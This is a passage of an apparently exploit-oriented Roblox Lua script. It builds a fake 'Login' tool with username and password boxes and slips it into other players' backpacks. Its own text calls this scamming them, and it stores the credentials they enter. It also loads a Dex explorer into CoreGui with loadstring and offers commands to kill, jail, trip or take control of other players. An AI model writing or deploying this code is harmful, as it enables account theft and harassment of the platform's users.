  617. local NewGuiPart52 = Instance.new("TextBox")
  618. NewGuiPart52.Active = false
  619. NewGuiPart52.BackgroundTransparency = 0.5
  620. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  621. NewGuiPart52.BorderSizePixel = 0
  622. NewGuiPart52.Name = "TB1"
  623. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  624. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  625. NewGuiPart52.FontSize = Enum.FontSize.Size18
  626. NewGuiPart52.Text = ""
  627. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  628. NewGuiPart52.TextWrapped = true
  629. NewGuiPart52.Parent = NewGuiPart50
  630. -------
  631. local NewGuiPart53 = Instance.new("TextButton")
  632. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  633. NewGuiPart53.BackgroundTransparency = 0.5
  634. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  635. NewGuiPart53.BorderSizePixel = 0
  636. NewGuiPart53.Name = "TB"
  637. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  638. NewGuiPart53.Selectable = true
  639. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  640. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  641. NewGuiPart53.FontSize = Enum.FontSize.Size18
  642. NewGuiPart53.Text = "Save"
  643. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  644. NewGuiPart53.TextWrapped = true
  645. NewGuiPart53.Parent = NewGuiPart50
  646.  
  647. -------
  648. local NewGuiPart55 = Instance.new("TextLabel")
  649. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  650. NewGuiPart55.BackgroundTransparency = 1
  651. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  652. NewGuiPart55.BorderSizePixel = 0
  653. NewGuiPart55.Name = "TL2"
  654. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
  655. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  656. NewGuiPart55.FontSize = Enum.FontSize.Size18
  657. NewGuiPart55.Text = "Tool Name"
  658. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  659. NewGuiPart55.TextWrapped = true
  660. NewGuiPart55.Parent = NewGuiPart50
  661. -------
  662. local NewGuiPart56 = Instance.new("TextButton")
  663. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  664. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  665. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  666. NewGuiPart56.BorderSizePixel = 0
  667. NewGuiPart56.Name = "TL4"
  668. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  669. NewGuiPart56.Selectable = true
  670. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  671. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  672. NewGuiPart56.FontSize = Enum.FontSize.Size14
  673. NewGuiPart56.Text = "CMD"
  674. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  675. NewGuiPart56.Parent = NewGuiPart2
  676. -------
  677. local NewGuiPart57 = Instance.new("Frame")
  678. NewGuiPart57.BackgroundTransparency = 1
  679. NewGuiPart57.Name = "ChatBox"
  680. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  681. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  682. NewGuiPart57.Visible = false
  683. NewGuiPart57.Draggable = true
  684. NewGuiPart57.Parent = NewGuiPart2
  685. -------
  686. local NewGuiPart58 = Instance.new("TextButton")
  687. NewGuiPart58.Active = true
  688. NewGuiPart58.BackgroundTransparency = 0.5
  689. NewGuiPart58.BorderSizePixel = 0
  690. NewGuiPart58.Name = "Chat"
  691. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  692. NewGuiPart58.Selectable = true
  693. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  694. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  695. NewGuiPart58.FontSize = Enum.FontSize.Size14
  696. NewGuiPart58.Text = "Chat"
  697. NewGuiPart58.Parent = NewGuiPart57
  698. -------
  699. local NewGuiPart59 = Instance.new("TextLabel")
  700. NewGuiPart59.BackgroundTransparency = 0.5
  701. NewGuiPart59.BorderSizePixel = 0
  702. NewGuiPart59.Name = "Output"
  703. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  704. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  705. NewGuiPart59.Font = Enum.Font.Legacy
  706. NewGuiPart59.FontSize = Enum.FontSize.Size14
  707. NewGuiPart59.Text = ""
  708. NewGuiPart59.TextWrapped = true
  709. NewGuiPart59.Parent = NewGuiPart57
  710. -------
  711. local NewGuiPart60 = Instance.new("TextBox")
  712. NewGuiPart60.BackgroundTransparency = 0.5
  713. NewGuiPart60.Name = "Input"
  714. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  715. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  716. NewGuiPart60.FontSize = Enum.FontSize.Size28
  717. NewGuiPart60.Text = ""
  718. NewGuiPart60.Parent = NewGuiPart57
  719. -------
  720. local NewGuiPart61 = Instance.new("Frame")
  721. NewGuiPart61.BackgroundTransparency = 1
  722. NewGuiPart61.Name = "CMDS"
  723. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  724. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  725. NewGuiPart61.Visible = false
  726. NewGuiPart61.Draggable = true
  727. NewGuiPart61.Parent = NewGuiPart2
  728. -------
  729. local NewGuiPart62 = Instance.new("TextButton")
  730. NewGuiPart62.Active = true
  731. NewGuiPart62.BackgroundTransparency = 0.5
  732. NewGuiPart62.BorderSizePixel = 0
  733. NewGuiPart62.Name = "Execute"
  734. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  735. NewGuiPart62.Selectable = true
  736. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  737. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  738. NewGuiPart62.FontSize = Enum.FontSize.Size12
  739. NewGuiPart62.Text = "Execute"
  740. NewGuiPart62.Parent = NewGuiPart61
  741. -------
  742. local NewGuiPart63 = Instance.new("TextLabel")
  743. NewGuiPart63.BackgroundTransparency = 0.5
  744. NewGuiPart63.BorderSizePixel = 0
  745. NewGuiPart63.Name = "Output"
  746. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  747. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  748. NewGuiPart63.Font = Enum.Font.Legacy
  749. NewGuiPart63.FontSize = Enum.FontSize.Size14
  750. NewGuiPart63.Text = ""
  751. NewGuiPart63.TextWrapped = true
  752. NewGuiPart63.Parent = NewGuiPart61
  753. -------
  754. local NewGuiPart64 = Instance.new("TextBox")
  755. NewGuiPart64.BackgroundTransparency = 0.5
  756. NewGuiPart64.Name = "CmdInput"
  757. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  758. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  759. NewGuiPart64.FontSize = Enum.FontSize.Size14
  760. NewGuiPart64.Text = ""
  761. NewGuiPart64.Parent = NewGuiPart61
  762.  
  763. local IsRunning = Instance.new("BoolValue")
  764. IsRunning.Value = false
  765. IsRunning.Name = "IsRunning"
  766. IsRunning.Parent = NewGuiPart2
  767.  
  768. local Login = Instance.new("Tool")
  769. Login.CanBeDropped = false
  770. Login.ManualActivationOnly = false
  771. Login.RequiresHandle = false
  772. Login.Name = "Login"
  773. Login.Parent = NewGuiPart1
  774.  
  775. local ToolName = Instance.new("StringValue")
  776. ToolName.Value = "Login"
  777. ToolName.Parent = CoreValues
  778. ToolName.Name = "ToolName"
  779.  
  780.  
  781. local NewGuiPart65 = Instance.new("ScreenGui")
  782. NewGuiPart65.Name = "LoginGui"
  783. NewGuiPart65.Parent = Login
  784. -------
  785. local NewGuiPart66 = Instance.new("Frame")
  786. NewGuiPart66.Name = "ErrorFrame"
  787. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  788. NewGuiPart66.Visible = false
  789. NewGuiPart66.Parent = NewGuiPart65
  790. -------
  791. local NewGuiPart67 = Instance.new("ImageLabel")
  792. NewGuiPart67.Active = false
  793. NewGuiPart67.Selectable = false
  794. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  795. NewGuiPart67.Image = "rbxassetid://423929933"
  796. NewGuiPart67.Parent = NewGuiPart66
  797. -------
  798. local NewGuiPart69 = Instance.new("TextLabel")
  799. NewGuiPart69.BackgroundTransparency = 1
  800. NewGuiPart69.BorderSizePixel = 0
  801. NewGuiPart69.Name = "UserName"
  802. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  803. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  804. NewGuiPart69.Font = Enum.Font.Legacy
  805. NewGuiPart69.FontSize = Enum.FontSize.Size14
  806. NewGuiPart69.Text = "UserName"
  807. NewGuiPart69.Parent = NewGuiPart66
  808. -------
  809. local NewGuiPart70 = Instance.new("TextLabel")
  810. NewGuiPart70.BackgroundTransparency = 1
  811. NewGuiPart70.BorderSizePixel = 0
  812. NewGuiPart70.Name = "Password"
  813. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  814. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  815. NewGuiPart70.Font = Enum.Font.Legacy
  816. NewGuiPart70.FontSize = Enum.FontSize.Size14
  817. NewGuiPart70.Text = "Password"
  818. NewGuiPart70.Parent = NewGuiPart66
  819. -------
  820. local NewGuiPart71 = Instance.new("TextBox")
  821. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  822. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  823. NewGuiPart71.BorderSizePixel = 2
  824. NewGuiPart71.Name = "TB2"
  825. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  826. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  827. NewGuiPart71.Font = Enum.Font.Legacy
  828. NewGuiPart71.FontSize = Enum.FontSize.Size14
  829. NewGuiPart71.Text = ""
  830. NewGuiPart71.Parent = NewGuiPart66
  831. -------
  832. local NewGuiPart72 = Instance.new("ImageButton")
  833. NewGuiPart72.Active = true
  834. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  835. NewGuiPart72.BackgroundTransparency = 0.5
  836. NewGuiPart72.Name = "LoginButton"
  837. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  838. NewGuiPart72.Selectable = true
  839. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  840. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  841. NewGuiPart72.Visible = true
  842. NewGuiPart72.Image = "rbxassetid://431070395"
  843. NewGuiPart72.Parent = NewGuiPart66
  844. -------
  845. local NewGuiPart73 = Instance.new("TextLabel")
  846. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  847. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  848. NewGuiPart73.BorderSizePixel = 0
  849. NewGuiPart73.Name = "TB1"
  850. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  851. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  852. NewGuiPart73.Font = Enum.Font.Legacy
  853. NewGuiPart73.FontSize = Enum.FontSize.Size14
  854. NewGuiPart73.Text = ""
  855. NewGuiPart73.Parent = NewGuiPart66
  856.  
  857.  
  858. local Textg = Instance.new("TextLabel")
  859. Textg.BackgroundColor3 = Color3.new(255,255,255)
  860. Textg.BorderColor3 = Color3.new(0, 0, 0)
  861. Textg.BorderSizePixel = 0
  862. Textg.Name = "Text"
  863. Textg.Position = UDim2.new(0, 90, 0.5,115)
  864. Textg.Size = UDim2.new(0, 200, 0, 20)
  865. Textg.Font = Enum.Font.Legacy
  866. Textg.FontSize = Enum.FontSize.Size14
  867. Textg.Text = ""
  868. Textg.Parent = NewGuiPart66
  869.  
  870. local Done = Instance.new("BoolValue")
  871. Done.Name = "Done"
  872. Done.Value = false
  873. Done.Parent = NewGuiPart66
  874.  
  875. local Folderr = Instance.new("Folder")
  876. Folderr.Parent = CoreValues
  877. Folderr.Name = "Folder"
  878.  
  879.  
  880. local UserName = Instance.new("StringValue")
  881. UserName.Name = "UserName"
  882. UserName.Parent = Folderr
  883.  
  884. local PassWord = Instance.new("StringValue")
  885. PassWord.Name = "Password"
  886. PassWord.Parent = Folderr
  887.  
  888.  
  889.  
  890. local UsingTool = Instance.new("BoolValue")
  891. UsingTool.Parent = CoreValues
  892. UsingTool.Name = "UsingTool"
  893. UsingTool.Value = true
  894.  
  895. NewGuiPart1:Clone().Parent = CoreValues
  896. NewGuiPart65:Clone().Parent = CoreValues
  897.  
  898.  
  899.  
  900. print("MGVX LIB Running")
  901. local Lib = Instance.new("Folder")
  902. Lib.Name = "ACCOUNTLIB"
  903. Lib.Parent = CoreValues
  904.  
  905. if PassWord.Value ~= nil and UserName.Value ~= nil then
  906. namer = Instance.new("Folder")
  907. namer.Parent = Lib
  908. namer.Name = UserName.Value
  909. old = PassWord:Clone()
  910. old.Parent = namer
  911. old.Name = UserName.Value
  912. oldu = UserName:Clone()
  913. oldu.Parent = namer
  914. oldu.Name = UserName.Value
  915. new = PassWord:Clone()
  916. new.Value = ""
  917. new.Name = "PassWord"
  918. new.Parent = Folderr
  919. newu = UserName:Clone()
  920. newu.Value = ""
  921. newu.Name = "UserName"
  922. newu.Parent = Folderr
  923. UserName:Destroy();
  924. PassWord:Destroy();
  925. end
  926.  
  927. --------------FUNCTIONS---------------
  928. local NumofPlayers = game:GetService("Players").NumPlayers
  929. local NumOfPlayersBeingScammed = NumofPlayers-1
  930. local DoneBeingScammed = {}
  931.  
  932.  
  933.  
  934.  
  935.  
  936.  
  937. function Clicked4()
  938.  
  939. if NewGuiPart52.Text ~= nil then
  940. Login.Name = NewGuiPart52.Text
  941. ToolName.Value = NewGuiPart52.Text
  942. end
  943.  
  944. if NewGuiPart52.Text == nil then
  945. Login.Name = "Login"
  946. ToolName.Value = "Login"
  947. end
  948.  
  949.  
  950.  
  951.  
  952. NewGuiPart50.Visible = false
  953.  
  954. end
  955.  
  956.  
  957.  
  958. function Click()
  959. local ppl = game.Players:GetChildren()
  960. local spots = NewGuiPart6:children()
  961. for i = 1,#ppl do
  962. spots[i].Visible = true
  963. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  964. spots[i].TextLabel.Text = ppl[i].Name
  965. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  966. spots[i].TextLabel.Text = ''
  967. spots[i].ImageLabel.Image = ''
  968. end
  969. end
  970. end
  971. function Clicked()
  972. otherp.Backpack:GetChildren().Parent = workspace
  973.  
  974.  
  975. if UsingTool.Value == true then
  976. Login:Clone().Parent = otherp.Backpack
  977. NewGuiPart4.Text = "Scanning..."
  978. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  979. NewGuiPart50.Visible = false
  980. NewGuiPart61.Visible = false
  981. NewGuiPart5.Visible = true
  982. IsRunning.Value = true
  983. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  984. end
  985. end
  986.  
  987.  
  988.  
  989. function Clicked1()
  990. NewGuiPart5.Visible = false
  991. NewGuiPart61.Visible = false
  992. NewGuiPart50.Visible = true
  993. end
  994.  
  995. function Clicked2()
  996. NewGuiPart5.Visible = false
  997. NewGuiPart50.Visible = false
  998. NewGuiPart61.Visible = true
  999. end
  1000.  
  1001.  
  1002. plrrr = game.Players.LocalPlayer
  1003. plrr = game.Players:GetChildren()
  1004. Input = NewGuiPart64
  1005. Exe = NewGuiPart62
  1006. Output = NewGuiPart63
  1007. Output.Text = "Welcome, "..plrrr.Name.."."
  1008.  
  1009.  
  1010. game.Players.PlayerAdded:connect(function()
  1011. local ppl = game.Players:GetChildren()
  1012. local spots = NewGuiPart6:children()
  1013. for i = 1,#ppl do
  1014. spots[i].Visible = true
  1015. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1016. spots[i].TextLabel.Text = ppl[i].Name
  1017. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1018. spots[i].TextLabel.Text = ''
  1019. spots[i].ImageLabel.Image = ''
  1020. end
  1021.  
  1022. end
  1023. end)
  1024.  
  1025. game.Players.PlayerRemoving:connect(function()
  1026. local ppl = game.Players:GetChildren()
  1027. local spots = NewGuiPart6:children()
  1028. for i = 1,#ppl do
  1029. spots[i].Visible = true
  1030. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1031. spots[i].TextLabel.Text = ppl[i].Name
  1032. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1033. spots[i].TextLabel.Text = ''
  1034. spots[i].ImageLabel.Image = ''
  1035. end
  1036.  
  1037. end
  1038. end)
  1039.  
  1040.  
  1041. function Clicked3(arg)
  1042. local Cmd = Input
  1043. local allp = game.Players:GetChildren()
  1044. local numb;
  1045. local pp;
  1046. local p;
  1047. local num;
  1048. local argus = {"me", "all",numb,plrr}
  1049.  
  1050. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1051. local guu = game:GetObjects("rbxassetid://418955355")[1] guu.Parent = game.CoreGui
  1052. guu.ExplorerPanel.LocalScript.Source = string.gsub(guu.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1053. guu.PropertiesFrame.Properties.Source = string.gsub(guu.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1054. guu.Selection.Source = string.gsub(guu.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1055.  
  1056. spawn(function()
  1057. loadstring(guu.ExplorerPanel.LocalScript.Source)()
  1058. end)
  1059. spawn(function()
  1060. loadstring(guu.PropertiesFrame.Properties.Source)()
  1061. end)
  1062. spawn(function()
  1063. loadstring(guu.Selection.Source)()
  1064. end)
  1065.  
  1066.  
  1067.  
  1068. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1069. game.CoreGui.Dex:Destroy()
  1070. end
  1071.  
  1072. if Cmd.Text:lower():sub(1,4) == "hat " then
  1073. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1074. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1075. for i, v in pairs(plrz) do
  1076. coroutine.resume(coroutine.create(function()
  1077. if v and v.Character then
  1078. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1079. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1080. obj:Destroy()
  1081. end
  1082. end))
  1083. end
  1084. end
  1085.  
  1086. if Cmd.Text:lower():sub(1,5) == "cape " then
  1087. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1088. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1089. local str = "torso.BrickColor"
  1090. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1091. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1092. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1093. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1094. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1095. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1096. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1097. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1098. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1099. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1100. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1101. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1102. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1103. if BrickColor.new(teststr) ~= nil then str = teststr end
  1104. end
  1105. for i, v in pairs(plrz) do
  1106. coroutine.resume(coroutine.create(function()
  1107. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1108. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1109. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1110. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1111. local torso = plr.Character.Torso
  1112. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1113. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1114. p.Size = Vector3.new(.2,.2,.2)
  1115. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1116. local motor1 = Instance.new("Motor", p)
  1117. motor1.Part0 = p
  1118. motor1.Part1 = torso
  1119. motor1.MaxVelocity = .01
  1120. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1121. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1122. local wave = false
  1123. repeat wait(1/44)
  1124. local ang = 0.1
  1125. local oldmag = torso.Velocity.magnitude
  1126. local mv = .002
  1127. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1128. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1129. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1130. motor1.DesiredAngle = -ang
  1131. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1132. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1133. if torso.Velocity.magnitude < .1 then wait(.1) end
  1134. until not p or p.Parent ~= torso.Parent
  1135. script:Destroy()
  1136. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1137. end
  1138. end))
  1139. end
  1140. end
  1141.  
  1142. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1143. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1144. for i, v in pairs(plrz) do
  1145. coroutine.resume(coroutine.create(function()
  1146. if v and v:findFirstChild("PlayerGui") and v.Character then
  1147. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1148. end
  1149. end))
  1150. end
  1151. end
  1152.  
  1153.  
  1154. if Cmd.Text:lower():sub(1,5) == "jail " then
  1155. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1156. for i, v in pairs(plrz) do
  1157. coroutine.resume(coroutine.create(function()
  1158. if v and v.Character and v.Character:findFirstChild("Torso") then
  1159. local vname = v.Name
  1160. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1161. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1162. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1163. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1164. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1165. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1166. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1167. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1168. end)
  1169. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1170. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1171. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1172. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1173. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1174. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1175. local msh2 = msh:Clone() msh2.Parent = back
  1176. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1177. local msh4 = msh3:Clone() msh4.Parent = left
  1178. v.Character.Torso.CFrame = cf
  1179. end
  1180. end))
  1181. end
  1182. end
  1183.  
  1184. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1185. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1186. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1187. end
  1188.  
  1189.  
  1190.  
  1191. if Cmd.Text:lower():sub(1,8) == "control " then
  1192. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1193. for i, v in pairs(plrz) do
  1194. coroutine.resume(coroutine.create(function()
  1195. if v and v.Character then
  1196. v.Character.Humanoid.PlatformStand = true
  1197. local w = Instance.new("Weld", plr.Character.Torso )
  1198. w.Part0 = plr.Character.Torso
  1199. w.Part1 = v.Character.Torso
  1200. local w2 = Instance.new("Weld", plr.Character.Head)
  1201. w2.Part0 = plr.Character.Head
  1202. w2.Part1 = v.Character.Head
  1203. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1204. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1205. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1206. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1207. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1208. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1209. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1210. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1211. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1212. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1213. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1214. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1215. plr.Character.Head.face:Destroy()
  1216. for i, p in pairs(v.Character:children()) do
  1217. if p:IsA("BasePart") then
  1218. p.CanCollide = false
  1219. end
  1220. end
  1221. for i, p in pairs(plr.Character:children()) do
  1222. if p:IsA("BasePart") then
  1223. p.Transparency = 1
  1224. elseif p:IsA("Hat") then
  1225. p:Destroy()
  1226. end
  1227. end
  1228. v.Character.Parent = plr.Character
  1229. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1230. end
  1231. end))
  1232. end
  1233. end
  1234.  
  1235. if Cmd.Text:lower():sub(1,5) == "kill " then
  1236. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1237. for i, v in pairs(plrz) do
  1238. coroutine.resume(coroutine.create(function()
  1239. if v and v.Character then v.Character:BreakJoints() end
  1240. end))
  1241. end
  1242. end
  1243.  
  1244.  
  1245.  
  1246. if Cmd.Text:lower():sub(1,5) == "trip " then
  1247. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1248. for i, v in pairs(plrz) do
  1249. coroutine.resume(coroutine.create(function()
  1250. if v and v.Character and v.Character:findFirstChild("Torso") then
  1251. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1252. end
  1253. end))
  1254. end
